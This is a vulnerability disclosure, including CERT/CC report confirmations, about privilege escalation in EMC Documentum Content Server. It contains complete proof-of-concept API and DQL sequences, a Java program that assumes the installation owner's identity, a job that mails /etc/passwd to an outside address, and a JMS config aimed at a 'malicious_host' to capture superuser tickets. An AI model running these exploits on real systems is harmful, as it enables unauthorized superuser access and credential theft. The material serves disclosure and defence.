Product: EMC Documentum Content Server Vendor: EMC Version: ANY CVE: N/A Risk: High Status: public/not fixed
On April 2014 I discovered vulnerability in EMC Documentum Content Server which allow authenticated user to elevate privileges, hijack Content Server filesystem or execute arbitrary commands by creating malicious dm_jobobjects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).
On October 2014 vendor announced ESA-2014-105 which was claiming that vulnerability has been remediated. On November 2014 fix was contested (there was significant delay after ESA-2014-105 because vendor constantly fails to provide status of reported vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt, description provided to CERT/CC (another CNA was chosen because vendor fails to communicate) was: =================================8<================================ The problem is that non-privileged user is able to create dm_job objects and execute corresponding docbase methods (some examples of "malicious" methods are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here does mean some sequence of commands which result to existence of dm_job object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does not schedule jobs unless they are owned by superuser, so, the command sequence in that case was: "create dm_job and update dm_job", EMC thinks that they have fixed vulnerability, but they just fixed the sequence given in PoC, another sequence is "create dm_sysobject, update dm_sysobject & change dm_sysobject" - see VRF#HUGC34JH, it's already known attack. Also, I could provide third PoC related to this report, but I do not think that would be useful for EMC. =================================>8================================ Current status of CVE-2014-4626 is obscure, last public status could be found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340): =================================8<================================ The new exploit is being tracked under PSRC-2494. This is targeted for Q1 2015 (March patch). =================================>8================================ Though latest builds of EMC Documentum Content Server successfully pass PoCs described previously: =================================8<================================ API> create,c,dm_job ... 08024be980006902 API> set,c,l,owner_name SET> dmadmin ... OK API> set,c,l,world_permit SET> 7 ... OK API> save,c,l ... [DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error: "Must have system admin privileges or superuser privileges to change the owner_name to 'dmadmin'." API> create,c,dm_sysobject ... 08024be980006904 API> set,c,l,owner_name SET> dmadmin ... OK API> set,c,l,world_permit SET> 7 ... OK API> save,c,l ... OK API> ?,c,change dm_sysobject object to dm_job where r_object_id='08024be980006904' [DM_QUERY_F_CHANGE_SAVE]fatal: "CHANGE: An unexpected save error has occurred for object 08024be980006904." [DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error: "The current user (test) needs to have superuser or sysadmin privilege to create or save or destroy objects of type (dm_job)." =================================>8================================ the vulnerability remains unfixed, below is a another PoC (job engine in Documentum consists of two parts: scheduler and executor, previous attacks were designed to exploit vulnerability in scheduler, this one demonstrates how to exploit vulnerability in job executor): =================================8<================================ API> create,c,dm_job ... 08024be98000690e API> set,c,l,object_name SET> malicious job ... OK API> set,c,l,inactivate_after_failure SET> 0 ... OK API> set,c,l,max_iterations SET> 0 ... OK API> set,c,l,method_name SET> dm_file_writer ... OK API> set,c,l,pass_standard_arguments SET> 0 ... OK API> set,c,l,run_interval SET> 1 ... OK API> set,c,l,run_mode SET> 1 ... OK API> set,c,l,run_now SET> 1 ... OK API> set,c,l,is_inactive SET> 0 ... OK API> set,c,l,world_permit SET> 7 ... OK API> append,c,l,method_arguments SET> /tmp/test.txt ... OK API> append,c,l,method_arguments SET> agentexec_has_vulnerability ... OK API> append,c,l,method_arguments SET> CREATE ... OK API> save,c,l ... OK API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method, ARGUMENTS,S,' -docbase_name DCTM_DEV.DCTM_DEV -docbase_owner dmadmin -job_id 08024be98000690e -log_directory /u01/documentum/cs/dba/log -docbase_id 150505 -trace_level 10 ' ... q0 API> next,c,q0 ... OK API> dump,c,q0 ... USER ATTRIBUTES result : 0 process_id : 91436 launch_failed : F method_return_val : 0 os_system_error : No Error timed_out : F time_out_length : 60 app_server_host_name : app_server_port : 0 app_server_uri : error_message : SYSTEM ATTRIBUTES APPLICATION ATTRIBUTES INTERNAL ATTRIBUTES API> Bye ~]$ cat /tmp/test.txt agentexec_has_vulnerability =================================>8================================ __ Regards,Andrey B. Panfilov
Vulnerability Report Confirmation - [VRF#HUFU6FNP] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFU6FNP. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to c...@cert.org <mailto:c...@cert.org?subject=VRF%20question%20VRF#HUFU6FNP>. Please reference this Report Tracking ID: VRF#HUFU6FNP. Do not use the back button to submit another report. Click here <https://forms.cert.org/VulReport/index.jsp> instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address and...@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges, hijack Content Server filesystem, execute any commands by creating malicious dm_job objects Documentum Content Server have some docbase methods that are not supposed to be used by regular users (such methods have special permissions, that prevent method invocation by regular user), examples of such methods: 1. mail method - emails text file to user API> retrieve,c,dm_method where object_name='mail' ... 1001d92080000174 API> dump,c,l ... USER ATTRIBUTES object_name : mail owner_permit : 7 group_name : docu group_permit : 5 world_permit : 3 method_verb : ./dm_mailwrapper.sh #!/bin/sh # Mail wrapper: customize if you like # Server will pass in subject, address and content_file # Return of 0 means send succeeded, non-zero status results in the # server generating an error message iff the method was launched # synchronously. delete_contents=0 if [ x"$1" = x"-delete_contents" ] ; then delete_contents=1 shift fi subject=$1 address=$2 content_file=$3 /bin/mail -s "$subject" "$address" < $content_file status=$? if [ $delete_contents = 1 ] ; then # remove the temporary content file once it is sent \rm $content_file fi exit $status Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle 1> execute do_method with method='mail', 2> arguments='test and...@panfilov.tel /etc/passwd' 3> go [DM_METHOD_E_ASSUME_USER_UV]error: "Your method named (mail) failed to execute because the assume user process could not validation your user credentials. Assume User Process returned (245=DM_CHKPASS_BAD_LOGIN)." 2. dm_file_writer - writes data to text files residing on Content Server filesystem API> retrieve,c,dm_method where object_name='dm_file_writer' ... 1001d920800003a1 API> dump,c,l ... USER ATTRIBUTES object_name : dm_file_writer owner_name : dmadmin owner_permit : 7 group_name : docu group_permit : 1 world_permit : 1 method_verb : dmbasic -eEntryPoint -f../install/admin/dm_file_writer.ebs Sub EntryPoint(FilePath As String, DmData As String, WriteMode As String) On Error Goto ErrorCatch Select Case WriteMode Case "DELETE" Call chgEntry(FilePath, DmData, WriteMode) Case "CREATE" Open FilePath For Append As #2 Print #2, DmData Close #2 Case "UPDATE" Call chgEntry(FilePath, DmData, WriteMode) Case "APPEND" Call chgEntry(FilePath, DmData, WriteMode) End Select DmExit 0 ErrorCatch: Print Error$() DmExit 1 End Sub though both methods could not be invoked by non-privileged user, attacker is able to create malicious dm_job object with required parameters, and after that Content Server will execute docbase method: Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle 1> create dm_job object 2> set object_name = 'malicious job' 3> set inactivate_after_failure = FALSE 4> set max_iterations = 0 5> set method_name = 'mail' 6> set pass_standard_arguments = FALSE 7> set run_interval = 1 8> set run_mode = 1 9> set run_now = TRUE 10> set start_date = DATE('11/24/2013','mm/dd/yyyy') 11> set expiration_date = DATE('12/11/2016','mm/dd/yyyy') 12> set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy') 13> set is_inactive = FALSE 14> set world_permit=7 15> append method_arguments = 'test' 16> append method_arguments = 'and...@panfilov.tel' 17> append method_arguments = '/etc/passwd' 18> go object_created ---------------- 0801d920805675b0 (1 row affected) Though Content Server checks dm_job's owner privileges before executing job it's possible to change owner of created dm_job object either through API or Webtop: Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle Session id is s0 API> set,c,0801d920805675b0,owner_name SET> dmadmin ... OK API> save,c,0801d920805675b0 ... OK API> ~]$ idql repo -Uuser -Ppassword >/dev/null <<_EOF_
create dm_job object
set object_name = 'malicious file writer'
set inactivate_after_failure = FALSE
set max_iterations = 0
set method_name = 'dm_file_writer'
set pass_standard_arguments = FALSE
set run_interval = 1
set run_mode = 1
set run_now = TRUE
set start_date = DATE('11/24/2013','mm/dd/yyyy')
set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
set is_inactive = FALSE
set world_permit=7
append method_arguments = '/tmp/test.txt'
append method_arguments = 'agentexec_has_vulnerability'
append method_arguments = 'CREATE'
go
_EOF_
~]$ iapi repo -Uuser -Ppassword >/dev/null <<_EOF_
retrieve,c,dm_job where object_name='malicious file writer' set,c,l,owner_name dmadmin save,c,l _EOF_
~]$ sleep 60 ~]$ cat /tmp/test.txt agentexec_has_vulnerability ~]$ Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? Yes Vulnerability Impact Comments Attached File Date 2014-04-25T14:52:21 Report Tracking ID VRF#HUFU6FNP CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University <http://www.cmu.edu/> ©2014 Carnegie Mellon University <http://www.cmu.edu/>
Vulnerability Report Confirmation - [VRF#HUFV0UZN] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFV0UZN. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to c...@cert.org <mailto:c...@cert.org?subject=VRF%20question%20VRF#HUFV0UZN>. Please reference this Report Tracking ID: VRF#HUFV0UZN. Do not use the back button to submit another report. Click here <https://forms.cert.org/VulReport/index.jsp> instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address and...@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges by creating malicious dm_job_request objects Vendor was notified about vulnerability on November 2013, though vendor claims, that vulnerability has been fixed, it wasn't announced and the fix is incomplete. Documentum Content Server has two service tasks intended for renaming users and groups: dm_UserRename and dm_GroupRename. Both are triggered when administrator renames user or group in Documentum Administrator or when dm_LDAPSynchronization job completes its execution. Those jobs polls uncompleted dm_job_request objects and performs corresponding changes, the problem is any user is able to create malicious dm_job_request object and either rename his group to system group (e.g. dm_superusers) or get unauthorized access to objects. Example of exploitation: -- creating test group API> create,c,dm_group ... 1201d9208000dd00 API> set,c,l,group_name SET> testjobrequest ... OK API> save,c,l ... OK -- creating test user API> create,c,dm_user ... 1101d9208007890i API> set,c,l,user_name SET> testjobrequestusr ... OK API> set,c,l,user_login_name SET> testjobrequestusr ... OK API> set,c,l,user_source SET> inline password ... OK API> set,c,l,user_password SET> test ... OK API> save,c,l ... OK API> ?,c,alter group testjobrequest add testjobrequestusr -- creating test user session API> connect,repo,testjobrequestusr,test ... s1 -- creating request to rename testjobrequest group to dm_superusers API> ?,s1,CREATE dm_job_request OBJECT set object_name='GroupRename', set job_name='dm_GroupRename', set method_name='dm_GroupRename', set arguments_keys[0]='OldGroupName', set arguments_values[0]='testjobrequest', set arguments_keys[1]='NewGroupName', set arguments_values[1]='dm_superusers', set arguments_keys[2]='report_only', set arguments_values[2]='F', set arguments_keys[3]='unlock_locked_obj', set arguments_values[3]='T' object_created ---------------- 0801d920805759f7 (1 row affected) -- wait some time while dm_GroupRename job completes -- now testjobrequestusr user is a member of dm_superusers group API> ?,s1,select group_name from dm_group where any i_all_users_names='testjobrequestusr' group_name -------------------------------- dm_superusers (1 row affected) Currently EMC is trying to implement following approach to fix this issue - they denying to create dm_job_request objects with specific values of job_name: [DM_SESSION_I_SESSION_START]info: "Session 0101d920800f022e started for user unprivileged_user." Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle 1> CREATE dm_job_request OBJECT set object_name='GroupRename', 2> set job_name='dm_GroupRename', 3> set method_name='dm_GroupRename', 4> set arguments_keys[0]='OldGroupName', 5> set arguments_values[0]='testjobrequest', 6> set arguments_keys[1]='NewGroupName', 7> set arguments_values[1]='dm_superusers', 8> set arguments_keys[2]='report_only', 9> set arguments_values[2]='F', 10> set arguments_keys[3]='unlock_locked_obj', 11> set arguments_values[3]='T' 12> go [DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save operation." [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (unprivileged_user) needs to have superuser or sysadmin privilege." BUT: 1> CREATE dm_job_request OBJECT set object_name='GroupRename', 2> set job_name='dm_GroupRename1', 2> set method_name='dm_GroupRename', 4> set arguments_keys[0]='OldGroupName', 5> set arguments_values[0]='testjobrequest', 6> set arguments_keys[1]='NewGroupName', 7> set arguments_values[1]='dm_superusers', 8> set arguments_keys[2]='report_only', 9> set arguments_values[2]='F', 10> set arguments_keys[3]='unlock_locked_obj', 11> set arguments_values[3]='T' 12> go object_created ---------------- 0801d92080592bcd (1 row affected) So, according to VRF#HUFU6FNP non-privileged user is still able to exploit this vulnerability by creating own dm_job object and malicious dm_job_request. Also note that user with sysadmin privilege (VRF#HUDHKNW4) is able to exploit with vulnerability. Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? No Vulnerability Impact Comments Attached File Date 2014-04-25T15:16:00 Report Tracking ID VRF#HUFV0UZN CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University <http://www.cmu.edu/> ©2014 Carnegie Mellon University <http://www.cmu.edu/>
Vulnerability Report Confirmation - [VRF#HUGC34JH] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUGC34JH. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to c...@cert.org <mailto:c...@cert.org?subject=VRF%20question%20VRF#HUGC34JH>. Please reference this Report Tracking ID: VRF#HUGC34JH. Do not use the back button to submit another report. Click here <https://forms.cert.org/VulReport/index.jsp> instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address and...@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges by creating "protected" objects using "change object" command. In the most cases non-privileged users are restricted to create objects of certain types, for example, if user is able to create dm_method object, he is able to gain superuser privileges through execution of corresponding docbase method, so Content Server puts additional checks for userâs privileges before creating objects of certain types: Session id is s0 API> create,c,dm_method ... 1001ffd780095581 API> save,c,l ... [DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1) needs to have superuser or sysadmin privilege to save or destroy dm_method object." API> ?,c,create dm_method object set object_name='test' [DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save operation." [DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1) needs to have superuser or sysadmin privilege to save or destroy test dm_method object." The problem is user is able to "create" object of required type through execution of "change object" statement if both old and new types share the same type tag 1. dm_client_rights example: package com.documentum.fc.client.security.impl; import static java.lang.System.out; import com.documentum.fc.client.DfClient; import com.documentum.fc.client.DfQuery; import com.documentum.fc.client.IDfACL; import com.documentum.fc.client.IDfCollection; import com.documentum.fc.client.IDfQuery; import com.documentum.fc.client.IDfSession; import com.documentum.fc.client.IDfSessionManager; import com.documentum.fc.client.IDfSysObject; import com.documentum.fc.client.privilege.internal.IClientRegistration; import com.documentum.fc.client.privilege.internal.IClientRights; import com.documentum.fc.client.security.internal.IPublicIdentity; import com.documentum.fc.common.DfId; import com.documentum.fc.common.DfList; import com.documentum.fc.common.DfLoginInfo; import com.documentum.fc.common.IDfList; import com.documentum.fc.common.IDfLoginInfo; public class Test { public static void main(String argv[]) throws Exception { String docbase = argv[0]; String username = argv[1]; String password = argv[2]; String domain = null; if (argv.length == 4) { domain = argv[3]; } IDfSessionManager sessionManager = new DfClient().newSessionManager(); IDfLoginInfo loginInfo = new DfLoginInfo(username, password); if (domain != null) { loginInfo.setDomain(domain); } sessionManager.setIdentity(docbase, loginInfo); out.println("Connecting to docbase '" + docbase + "' as '" + username + "'"); IDfSession session = sessionManager.getSession(docbase); out.println("Connected"); IPublicIdentity publicIdentity = new PublicIdentity(); out.println("Checking dm_client_registration for dfc: " + publicIdentity.getIdentity()); IClientRegistration clientRegistration = IpAndRcHelper.getRegistration( publicIdentity, session); if (clientRegistration == null) { out.println("dm_client_registration for dfc '" + publicIdentity.getIdentity() + "' does not exist, creating..."); String publicKeyIdentifier = IpAndRcHelper .createNewCertificateObjectIfNeeded(publicIdentity, session); clientRegistration = (IClientRegistration) session .newObject("dm_client_registration"); RegAndItsAcl dbData = new RegAndItsAcl(); dbData.reg = clientRegistration; dbData.acl = (IDfACL) session.newObject("dm_acl"); dbData.acl = IpAndRcHelper .fillAndSaveACLForClientRegistration(dbData.acl); IpAndRcHelper.fillAndSaveClientRegistration(dbData.reg, publicIdentity, publicKeyIdentifier, dbData.acl); } else { out.println("dm_client_registration for dfc: " + publicIdentity.getIdentity() + " exists"); } out.println("Checking dm_client_rights for dfc: " + publicIdentity.getIdentity()); IClientRights clientRights = (IClientRights) session .getObjectByQualification("dm_client_rights where client_id='" + publicIdentity.getIdentity() + "'"); if (clientRights != null) { out.println("dm_client_rights object for dfc: " + publicIdentity.getIdentity() + " exists, exiting"); return; } out.println("dm_client_rights object for dfc: " + publicIdentity.getIdentity() + " does not exist, creating"); IDfSysObject tempObject = (IDfSysObject) session .newObject("dm_sysobject"); tempObject.save(); IDfQuery query = new DfQuery("CHANGE dm_sysobject OBJECT " + "TO dm_client_rights SET object_name='" + clientRegistration.getObjectName() + "', " + "SET client_id='" + publicIdentity.getIdentity() + "', " + "SET public_key_identifier='" + clientRegistration.getPublicKeyIdentifier() + "', " + "SET host_name='" + clientRegistration.getHostName() + "', SET allow_all_roles=TRUE, " + "SET allow_all_priv_modules=TRUE, " + "SET principal_auth_priv=TRUE, " + "SET server_trust_priv=TRUE WHERE r_object_id='" + tempObject.getObjectId().getId() + "'"); IDfCollection collection = query.execute(session, IDfQuery.EXEC_QUERY); boolean created = false; if (collection != null && collection.next()) { out.println("Object changed: " + collection.getInt("objects_changed")); if (collection.getInt("objects_changed") > 0) { created = true; } } if (collection != null) { collection.close(); } if (!created) { out.println("Unable to create dm_client_rights object"); return; } String installationOwner = session.getServerConfig().getString( "r_install_owner"); out.println("Reconnecting as " + installationOwner + " ..."); IDfList arguments = new DfList(new String[] {"CONNECT_POOLING", "ASSUME_USER", "CHECK_ONLY", "AUTHENTICATE_ONLY", "OS_LOGON_NAME", "LOGON_NAME", "TRUSTED_LOGIN_ALLOWED", }); IDfList types = new DfList(new String[] {"B", "B", "B", "B", "S", "S", "B", }); IDfList values = new DfList(new String[] {"F", "T", "F", "F", installationOwner, installationOwner, "T", }); collection = session.apply(DfId.DF_NULLID_STR, "AUTHENTICATE_USER", arguments, types, values); if (collection != null && collection.next()) { if (collection.getInt("RETURN_VALUE") != 1) { out.println("Unable to authenticate as " + installationOwner); return; } session.assume(new DfLoginInfo(installationOwner, session .getLoginTicketForUser(installationOwner))); out.println("Checking whether we are a superuser..."); IDfSysObject serverConfig = (IDfSysObject) session .getServerConfig(); out.println("Permissions for dm_server_config: " + serverConfig.getPermit()); } if (collection != null) { collection.close(); } } } 2. dm_job_request example (see also VRF#HUFV0UZN): 1> create dm_job_request OBJECT set object_name='GroupRename', 2> set job_name='dm_GroupRename1', 3> set method_name='dm_GroupRename', 4> set arguments_keys[0]='OldGroupName', 5> set arguments_values[0]='testjobrequest', 6> set arguments_keys[1]='NewGroupName', 7> set arguments_values[1]='dm_superusers', 8> set arguments_keys[2]='report_only', 9> set arguments_values[2]='F', 10> set arguments_keys[3]='unlock_locked_obj', 11> set arguments_values[3]='T' 12> go object_created ---------------- 08022428800058f6 (1 row affected) 1> update dm_job_request objects set job_name='dm_GroupRename' 2> where job_name='dm_GroupRename1' 3> go [DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save operation." [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (dm_bof_registry) needs to have superuser or sysadmin privilege." 1> create dm_sysobject object 2> set object_name='dm_GroupRename2' 3> go object_created ---------------- 08022428800058fd (1 row affected) 1> change dm_sysobject object to dm_job_request 2> set object_name='GroupRename', 3> set job_name='dm_GroupRename', 4> set method_name='dm_GroupRename', 5> set arguments_keys[0]='OldGroupName', 6> set arguments_values[0]='testjobrequest', 7> set arguments_keys[1]='NewGroupName', 8> set arguments_values[1]='dm_superusers', 9> set arguments_keys[2]='report_only', 10> set arguments_values[2]='F', 11> set arguments_keys[3]='unlock_locked_obj', 12> set arguments_values[3]='T' 13> where object_name='dm_GroupRename2' 14> go objects_changed --------------- 1 (1 row affected) [DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE statement." 3. dm_jms_config example (dm_jms_config could be used to "sniff" superuser login tickets): Pre Documentum Content Server v6.7SP1P26 behavior: create dm_jms_config object set object_name='malicious JMS config', set config_type=2, append server_config_id=(select r_object_id from dm_server_config) append servlet_name='do_bpm', append base_uri='http://malicious_host:port/....', append supported_protocol='http', append projection_enable=TRUE, append projection_proximity_value=1, append projection_targets='malicious_host', append projection_ports=0 Documentum Content Server v6.7SP1P26 behavior: 1> create dm_jms_config object 2> set object_name='test jms config' 3> go [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (dm_bof_registry) needs to have superuser or sysadmin privilege." 1> create dm_sysobject object 2> set object_name='test jms config' 3> go object_created ---------------- 08022428800056fa (1 row affected) 1> select r_object_id from dm_server_config 2> go r_object_id ---------------- 3d02242880000102 (1 row affected) 1> select r_object_id from dm_jms_config 2> go r_object_id ---------------- (0 rows affected) 1> change dm_sysobject object to dm_sysprocess_config 2> where object_name='test jms config' 3> go objects_changed --------------- 1 (1 row affected) [DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE statement." 1> change dm_sysprocess_config object to dm_jms_config 2> append server_config_id='3d02242880000102' 3> where object_name='test jms config' 4> go objects_changed --------------- 1 (1 row affected) [DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE statement." 4. dmc_module example (see also VRF#HUDHKNW4): 1> create dmc_module object 2> set object_name='test dmc module' 3> go [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (dm_bof_registry) needs to have superuser or sysadmin privilege." 1> create dm_folder object 2> set object_name='test dmc module' 3> go object_created ---------------- 0b0224288000578c (1 row affected) 1> change dm_folder object to dmc_module 2> where object_name='test dmc module' 3> go objects_changed --------------- 1 (1 row affected) [DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE statement." Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? Yes Vulnerability Impact Comments Attached File Date 2014-04-25T23:13:39 Report Tracking ID VRF#HUGC34JH CERT Tracking IDs VU#315340 ------------------------------------------------------------------------ Carnegie Mellon University <http://www.cmu.edu/> ©2014 Carnegie Mellon University <http://www.cmu.edu/>
